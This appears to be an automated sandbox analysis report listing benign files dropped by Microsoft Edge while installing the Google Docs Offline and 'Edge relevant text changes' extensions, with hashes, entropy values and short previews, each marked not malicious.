Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1074
Entropy (8bit):	5.062722522759407
Encrypted:	false
SSDEEP:	24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
MD5:	773A3B9E708D052D6CBAA6D55C8A5438
SHA1:	5617235844595D5C73961A2C0A4AC66D8EA5F90F
SHA-256:	597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
SHA-512:	E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
Malicious:	false
Preview:	{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\zh_CN\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	879
Entropy (8bit):	5.7905809868505544
Encrypted:	false
SSDEEP:	12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
MD5:	3E76788E17E62FB49FB5ED5F4E7A3DCE
SHA1:	6904FFA0D13D45496F126E58C886C35366EFCC11
SHA-256:	E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
SHA-512:	F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\zh_HK\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1205
Entropy (8bit):	4.50367724745418
Encrypted:	false
SSDEEP:	24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
MD5:	524E1B2A370D0E71342D05DDE3D3E774
SHA1:	60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
SHA-256:	30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
SHA-512:	D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
Malicious:	false
Preview:	{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\zh_TW\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	843
Entropy (8bit):	5.76581227215314
Encrypted:	false
SSDEEP:	12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
MD5:	0E60627ACFD18F44D4DF469D8DCE6D30
SHA1:	2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
SHA-256:	F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
SHA-512:	6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\zu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	912
Entropy (8bit):	4.65963951143349
Encrypted:	false
SSDEEP:	24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
MD5:	71F916A64F98B6D1B5D1F62D297FDEC1
SHA1:	9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
SHA-256:	EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
SHA-512:	30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
Malicious:	false
Preview:	{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_metadata\verified_contents.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	11280
Entropy (8bit):	5.752941882424501
Encrypted:	false
SSDEEP:	192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuHEIIMuuqd7CKqvVpfcNLFev:m8IEI4u8ROxev
MD5:	F897300492E3AB467E56883D23D02D77
SHA1:	DECD6DC9E70ECCF9B45983147680614C019B99EA
SHA-256:	F9B3A5747DEDCB5AED58FCFC0F4FD3BD2F2E903F2CCEF90A92A73DBC0F8C3DBD
SHA-512:	B8AC574E24814BAF04A264E7F3F00B4285CD7B66104DFC77897440A898FCA5230775300EC7DEF723678975A04C2CD1BC73A44F77DA26262E8704029930990C62
Malicious:	false
Preview:	[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\dasherSettingSchema.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	854
Entropy (8bit):	4.284628987131403
Encrypted:	false
SSDEEP:	12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
MD5:	4EC1DF2DA46182103D2FFC3B92D20CA5
SHA1:	FB9D1BA3710CF31A87165317C6EDC110E98994CE
SHA-256:	6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
SHA-512:	939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
Malicious:	false
Preview:	{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\manifest.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2525
Entropy (8bit):	5.417781191647272
Encrypted:	false
SSDEEP:	24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj1H9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/APHgiVb
MD5:	35068E2550395A8A3E74558F2F4658DA
SHA1:	BD6620054059BFB7A27A4FFF86B9966727F2C2B9
SHA-256:	E2F418C816895E830541F48C0406B9398805E88B61A4EC816244154CD793743C
SHA-512:	4BCB971D7353648ABF25ACA7A4A4771F62BBB76F8FC13BDE886F29826D9314F5101942492004FC719493604D317958B63A95CF5173F8180214F27D6BEA303F97
Malicious:	false
Preview:	{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/", "https://drive.google.com/", "https://drive-autopush.corp.google.com/", "https://drive-daily-0.corp.google.com/", "https://drive-daily-1.corp.google.com/", "https://drive-daily-2.corp.google.com/", "https://drive-daily-3.corp.google.com/", "https://drive-daily-4.corp.google.com/", "https://drive-daily-5.corp.google.com/", "https://drive-daily-6.corp.google.com/", "https://drive-preprod.corp.google.com/", "https://drive-staging.corp.google.com/" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\offscreendocument.html

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	97
Entropy (8bit):	4.862433271815736
Encrypted:	false
SSDEEP:	3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
MD5:	B747B5922A0BC74BBF0A9BC59DF7685F
SHA1:	7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
SHA-256:	B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
SHA-512:	7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
Malicious:	false
Preview:	<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\offscreendocument_main.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3700)
Category:	dropped
Size (bytes):	95606
Entropy (8bit):	5.405749379350638
Encrypted:	false
SSDEEP:	1536:rFTnpa+88KmEfryTdXPVy0d8RZZ0Qk4CWbsnf29Gmyj9tIRRduRnCrl:almPXPVCFCWbsnDVQRwF0l
MD5:	9D0EF4F7CB0306DCB7A7CDCD6DC2CCC7
SHA1:	88D7F0A88C5807BFE00F13B612CC0522EEBE514A
SHA-256:	E5E4392B21A21ECAFD27707BF70F95961B2656735A20B40BA54479D40EAB063C
SHA-512:	34CD9AF9199DE606A531E98DB82BEAA5552E59BCCB2AB2BF49F82D6FA05425EB6936BC5F03BFC421AB6980B91395D9FDC5F0776882E1D49B3217CD35641FF906
Malicious:	false
Preview:	'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function l(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\page_embed_script.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	291
Entropy (8bit):	4.65176400421739
Encrypted:	false
SSDEEP:	6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
MD5:	3AB0CD0F493B1B185B42AD38AE2DD572
SHA1:	079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
SHA-256:	73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
SHA-512:	32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
Malicious:	false
Preview:	(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\service_worker_bin_prod.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3705)
Category:	dropped
Size (bytes):	104595
Entropy (8bit):	5.385879258644142
Encrypted:	false
SSDEEP:	1536:CvBfoqPByzpq7Wj3X5GtH2n4JvHDxwKMpFs0vuFfkR/2oTnHu96Iny0Kj2ThzfS:BlXQtoZrs0vskDTHu9rhTS
MD5:	4E0C47897BF98DEAC56F800942E150C4
SHA1:	7903D30E0ACEE273724BDAA67446D9FD4E8460A5
SHA-256:	FE76EA0C2F81E6140F38F4143B40BE85014B93FF80737600CFB39AEB5C8C6537
SHA-512:	8B31463FC683439BAB5D4AEFE2BE0F6A9F5B695C2D95AFF3F842BFC74B10AE3D386D288121161506F74A08FB86D25C1096DA4177B768254BF84E83983982640F
Malicious:	false
Preview:	'use strict';function aa(){return function(){}}function k(a){return function(){return this[a]}}function ba(a){return function(){return a}}var n;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=ea(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new TypeError("Symbol is not a constructor");retu

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1099924495\CRX_INSTALL\_metadata\verified_contents.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1753
Entropy (8bit):	5.8889033066924155
Encrypted:	false
SSDEEP:	48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
MD5:	738E757B92939B24CDBBD0EFC2601315
SHA1:	77058CBAFA625AAFBEA867052136C11AD3332143
SHA-256:	D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
SHA-512:	DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
Malicious:	false
Preview:	[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1099924495\CRX_INSTALL\content.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
Category:	dropped
Size (bytes):	9815
Entropy (8bit):	6.1716321262973315
Encrypted:	false
SSDEEP:	192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
MD5:	3D20584F7F6C8EAC79E17CCA4207FB79
SHA1:	3C16DCC27AE52431C8CDD92FBAAB0341524D3092
SHA-256:	0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
SHA-512:	315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
Malicious:	false
Preview:	(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1099924495\CRX_INSTALL\content_new.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
Category:	dropped
Size (bytes):	10388
Entropy (8bit):	6.174387413738973
Encrypted:	false
SSDEEP:	192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
MD5:	3DE1E7D989C232FC1B58F4E32DE15D64
SHA1:	42B152EA7E7F31A964914F344543B8BF14B5F558
SHA-256:	D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
SHA-512:	177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
Malicious:	false
Preview:	(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1099924495\CRX_INSTALL\manifest.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	962
Entropy (8bit):	5.698567446030411
Encrypted:	false
SSDEEP:	24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
MD5:	E805E9E69FD6ECDCA65136957B1FB3BE
SHA1:	2356F60884130C86A45D4B232A26062C7830E622
SHA-256:	5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
SHA-512:	049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
Malicious:	false
Preview:	{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1099924495\b33adbda-eabd-4499-b378-378533ba35f9.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	11185
Entropy (8bit):	7.951995436832936
Encrypted:	false
SSDEEP:	192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
MD5:	78E47DDA17341BED7BE45DCCFD89AC87
SHA1:	1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
SHA-256:	67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
SHA-512:	9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
Malicious:	false
